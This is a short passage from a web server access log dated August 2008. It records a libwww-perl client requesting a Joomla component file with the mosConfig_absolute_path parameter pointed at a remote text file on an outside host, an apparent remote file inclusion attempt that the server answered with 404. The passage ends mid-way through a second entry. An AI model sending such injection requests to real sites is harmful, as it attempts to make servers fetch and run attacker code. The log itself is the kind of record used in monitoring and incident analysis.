89.208.43.121 - - [19/Aug/2008:12:11:56 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:11:57 -0700] "G